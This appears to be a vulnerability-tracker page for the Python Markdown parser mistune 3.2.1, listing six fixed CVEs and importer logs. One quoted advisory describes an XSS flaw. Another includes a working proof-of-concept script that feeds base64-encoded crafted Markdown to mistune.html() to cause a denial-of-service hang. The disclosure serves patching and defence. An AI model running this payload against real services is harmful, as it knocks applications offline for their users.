Staging Environment: Content and features may be unstable or change without notice.
Search for packages
Package details: pkg:pypi/mistune@3.2.1
purl pkg:pypi/mistune@3.2.1
Vulnerabilities affecting this package (0)
Vulnerability Summary Fixed by
This package is not known to be affected by vulnerabilities.
Vulnerabilities fixed by this package (6)
Vulnerability Summary Aliases
VCID-8tt4-rc9y-9qgc CVE-2026-44897
GHSA-v87v-83h2-53w7
VCID-dtjf-n7mt-z3ba CVE-2026-33079
GHSA-8mp2-v27r-99xp
VCID-j8pk-v8t3-ybbu CVE-2026-44898
GHSA-6269-cqxg-mhhv
VCID-jpzc-rd9c-vufu CVE-2026-44899
GHSA-ccfx-mfmx-2fx9
VCID-q9br-dckr-gkd1 Mistune is a Python Markdown parser with renderers and plugins. In 3.2.0 and realier, in src/mistune/directives/image.py, the render_figure() function concatenates figclass and figwidth options directly into HTML attributes without escaping. This allows attribute injection and XSS even when HTMLRenderer(escape=True) is used, because these values bypass the inline renderer. CVE-2026-44896
GHSA-58cw-g322-p94v
PYSEC-2026-168
VCID-sh4a-8vh7-ayb4 Duplicate Advisory: Mistune has a ReDoS in LINK_TITLE_RE that allows denial of service via crafted Markdown input ### Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-8mp2-v27r-99xp. This link is maintained to preserve external references. ### Original Description ### Summary **Denial-of-Service (DoS)** vulnerability in the Mistune Markdown parser. The issue occurs when processing specially crafted reference links, which can cause excessive parsing and CPU consumption, leading to application hangs. **Function affected:** parse_link_title() in helpers.py **Issue:** Malformed reference links cause excessive backtracking and parsing loops. **Impact:** Remote attackers can submit malicious Markdown to hang processes, causing service unavailability. ### Details ``` Name: mistune Version: 3.2.0 Python version: Python 3.13.9 PIP version: pip 25.2 OS: Kali-linux-VERSION="2025.4" ``` ### PoC ``` import mistune import base64 print("Exploit started....!") data = base64.b64decode( "WX5Efn5+RH5+fkRbIVt6XQoKW3q7XTpdOgoifn5+RFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcflt+RFshW3pdCgpbeg==" ) mistune.html(data.decode("utf-8", errors="ignore")) ``` ### Reproduce steps: Simply execute above python script it will hang & increase cpu utilization to 100% **Fuzzer Output (libFuzzer):** ``` ERROR: libFuzzer: timeout after 3 seconds SUMMARY: libFuzzer: timeout ``` **Stack Trace (Excerpt):** ``` mistune/helpers.py:170 in parse_link_title mistune/block_parser.py:259 in parse_ref_link mistune/core.py:216 in parse_method mistune/block_parser.py:458 in parse mistune/markdown.py:93 in parse mistune/markdown.py:120 in __call__ ``` ### IMAGE POC: <img width="1194" height="728" alt="POC" src="https://github.com/user-attachments/assets/009e836f-fff7-439e-b0be-6e889bed0077" /> ### Impact: Denial-of-Service (DoS) High CPU usage and application hang Potential for service unavailability in web apps or APIs processing untrusted Markdown ### Suggested Mitigations: Implement parsing depth and iteration limits. Limit reference-link title length. Detects excessive escape character sequences. Add defensive checks in parse_link_title. Add fuzz regression tests using the provided PoC. This vulnerability was discovered using coverage-guided fuzzing and is reproducible consistently. GHSA-hjph-f4mc-wx4c

Date Actor Action Vulnerability Source VulnerableCode Version
2026-05-31T21:40:52.891156+00:00 GHSA Importer Fixing VCID-jpzc-rd9c-vufu https://github.com/advisories/GHSA-ccfx-mfmx-2fx9 38.6.0
2026-05-31T21:40:52.850676+00:00 GHSA Importer Fixing VCID-j8pk-v8t3-ybbu https://github.com/advisories/GHSA-6269-cqxg-mhhv 38.6.0
2026-05-31T21:40:34.344172+00:00 GHSA Importer Fixing VCID-8tt4-rc9y-9qgc https://github.com/advisories/GHSA-v87v-83h2-53w7 38.6.0
2026-05-31T21:40:19.333243+00:00 GHSA Importer Fixing VCID-sh4a-8vh7-ayb4 https://github.com/advisories/GHSA-hjph-f4mc-wx4c 38.6.0
2026-05-31T21:40:19.292179+00:00 GHSA Importer Fixing VCID-dtjf-n7mt-z3ba https://github.com/advisories/GHSA-8mp2-v27r-99xp 38.6.0
2026-05-31T10:58:13.164666+00:00 GithubOSV Importer Fixing VCID-j8pk-v8t3-ybbu https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-6269-cqxg-mhhv/GHSA-6269-cqxg-mhhv.json 38.6.0
2026-05-31T10:58:11.896713+00:00 GithubOSV Importer Fixing VCID-8tt4-rc9y-9qgc https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-v87v-83h2-53w7/GHSA-v87v-83h2-53w7.json 38.6.0
2026-05-31T10:58:04.809587+00:00 GithubOSV Importer Fixing VCID-sh4a-8vh7-ayb4 https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-hjph-f4mc-wx4c/GHSA-hjph-f4mc-wx4c.json 38.6.0
2026-05-31T10:57:29.707304+00:00 GithubOSV Importer Fixing VCID-jpzc-rd9c-vufu https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-ccfx-mfmx-2fx9/GHSA-ccfx-mfmx-2fx9.json 38.6.0
2026-05-31T10:56:44.462655+00:00 GithubOSV Importer Fixing VCID-dtjf-n7mt-z3ba https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-8mp2-v27r-99xp/GHSA-8mp2-v27r-99xp.json 38.6.0
2026-05-31T09:48:06.939102+00:00 PyPI Importer Fixing VCID-q9br-dckr-gkd1 https://osv-vulnerabilities.storage.googleapis.com/PyPI/all.zip 38.6.0
2026-05-30T20:38:43.062065+00:00 Pypa Importer Fixing VCID-q9br-dckr-gkd1 https://github.com/pypa/advisory-database/blob/main/vulns/mistune/PYSEC-2026-168.yaml 38.6.0